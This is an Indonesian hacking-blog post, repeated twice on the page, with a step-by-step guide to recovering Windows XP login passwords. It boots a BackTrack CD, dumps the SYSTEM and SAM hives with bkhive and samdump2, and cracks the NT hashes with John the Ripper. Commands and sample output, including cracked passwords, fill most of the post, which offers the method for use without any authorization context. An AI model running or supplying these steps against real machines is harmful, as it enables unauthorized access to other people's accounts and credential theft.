~!6li3z ~!~ 3xpl0it5~

☺☻♥♦♣♠•◘○◙♂♀............. chev's site's .............. ☺☻♥♦♣♠•◘○♀↨-8

supaya bisa menggunakan blog ini ikuti tatacara yang ada di bawah ini ::>
ketik 'help' untuk melihat semua perintah yang tersedia pada Blog lalu tekan Enter..
daftar perintah saat kita mengetikan help bisa di eksekusi langsung seperti : prev,home,profile,dan lain-lain
untuk membuka posting yang pertama pilih dulu judul postingnya
untuk melihat postingnya silahkan ketik ls di depan tanda crash (# ls) terus tekan Enter

[chevssites@back|track]#

[chevssites@back|track]# ls

exploit password windows

0 comments | 1/15/11

persiapan
- CD Backtrack 2 atau 3 ( pada backtrack 4 agak beda perintahnya, disesuaikan zz ea..^_^ )
- Komputer berOS Windows XP yang akan dijadikan uji coba

let's go..........

1. atur boot squence agar dapat memboot dari cdrom
2. masukan cd backtrack 2 ke dalam cdrom
3. tunggu hingga tampilan login muncul
4. masukan username “root” dan password “toor”
5. periksa apakah drive system windows xp sudah di mount dengan perintah
bt ~ # df -hT
Filesystem    Type    Size Used Avail Use% Mounted on
tmpfs        tmpfs    108M 416K 108M   1% /
/dev/hda1     ntfs    30.0G 11.6G 18.5G 52% /mnt/hda1

- terlihat bahwa sistem windows telah di mount pada direktory /mnt/hda1 dengan filesystem NTFS

6. untuk memulainya ketikan perintah
bt ~ # bkhive /mnt/hda1/WINDOWS/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: 64ca9581144e534fa076a9fa2f4548c0

7. perintah selanjutnya untuk mendapatkan hash password
bt ~ # samdump2 /mnt/hda1/WINDOWS/system32/config/SAM system.txt > passhash.txt
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)
No password for user Guest(501)
No password for user SUPPORT_388945a0(1002)

8. pada tahap ini sudah didapatkan hash password, gunakan JTR untuk mencrack passwordnya ::
bt ~ # /pentest/password/john-1.7.2/run/john –format=NT passhash.txt
Loaded 3 password hashes with no different salts (NT MD4 [TridgeMD4])
passwd           (!6li3z)
password         (Administrator)

dapat disimpulkan bahwa user !6li3z menggunakan password “passwd”
dan user Administrator menggunakan password “password”

samdump2, bkhive : http://studenti.unina.it/~mcuomo/syskey/
john the ripper : http://www.openwall.com/john/

Labels: backtrack

posted by acep saepudin at 11:39 AM Permalink

0 Comments:

Post a Comment

~!6li3z ~!~ 3xpl0it5~

br>

[chevssites@back|track]#

[chevssites@back|track]# ls

exploit password windows

0 comments | 1/15/11

persiapan
- CD Backtrack 2 atau 3 ( pada backtrack 4 agak beda perintahnya, disesuaikan zz ea..^_^ )
- Komputer berOS Windows XP yang akan dijadikan uji coba

let's go..........

1. atur boot squence agar dapat memboot dari cdrom
2. masukan cd backtrack 2 ke dalam cdrom
3. tunggu hingga tampilan login muncul
4. masukan username “root” dan password “toor”
5. periksa apakah drive system windows xp sudah di mount dengan perintah
bt ~ # df -hT
Filesystem    Type    Size Used Avail Use% Mounted on
tmpfs        tmpfs    108M 416K 108M   1% /
/dev/hda1     ntfs    30.0G 11.6G 18.5G 52% /mnt/hda1

- terlihat bahwa sistem windows telah di mount pada direktory /mnt/hda1 dengan filesystem NTFS

6. untuk memulainya ketikan perintah
bt ~ # bkhive /mnt/hda1/WINDOWS/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: 64ca9581144e534fa076a9fa2f4548c0

7. perintah selanjutnya untuk mendapatkan hash password
bt ~ # samdump2 /mnt/hda1/WINDOWS/system32/config/SAM system.txt > passhash.txt
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)
No password for user Guest(501)
No password for user SUPPORT_388945a0(1002)

8. pada tahap ini sudah didapatkan hash password, gunakan JTR untuk mencrack passwordnya ::
bt ~ # /pentest/password/john-1.7.2/run/john –format=NT passhash.txt
Loaded 3 password hashes with no different salts (NT MD4 [TridgeMD4])
passwd           (!6li3z)
password         (Administrator)

dapat disimpulkan bahwa user !6li3z menggunakan password “passwd”
dan user Administrator menggunakan password “password”

samdump2, bkhive : http://studenti.unina.it/~mcuomo/syskey/
john the ripper : http://www.openwall.com/john/

Labels: backtrack

posted by acep saepudin at 11:39 AM Permalink

0 Comments:

Post a Comment